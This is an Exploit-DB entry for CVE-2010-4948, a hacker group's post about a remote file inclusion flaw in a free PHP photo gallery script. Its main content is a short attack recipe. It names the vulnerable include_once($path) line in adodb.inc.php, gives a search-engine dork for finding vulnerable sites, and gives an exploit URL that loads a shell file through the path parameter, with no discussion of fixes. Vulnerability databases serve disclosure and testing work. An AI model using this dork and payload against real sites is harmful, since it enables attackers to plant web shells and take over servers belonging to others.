Free PHP Photo Gallery Script - Remote File Inclusion

EDB-ID:

14438

CVE:

2010-4948

EDB Verified:

Author:

ViRuS Qalaa

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-07-22

Vulnerable App:

# Exploit Title:   Free PHP photo gallery script Remote File inclusion
Vulnerability
# Date: 2010/07/21
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script: http://phpweby.com/downloads/gallery
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: y.0@hotmail.de
:::::::::::::::::::::::::
Iam ViRuS Qalaa Frome Iraq Hackers
=================Exploit=================

-=[ vuln c0de ]=-
include_once($path);
/jadro/libs/adodb/adodb.inc.php
Line:4227

----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"

http://{localhost}/{path}/jadro/libs/adodb/adodb.inc.php?path=shell.txt?

---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq

and My friends Others and My friends in MSN
EnJoY o_O

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services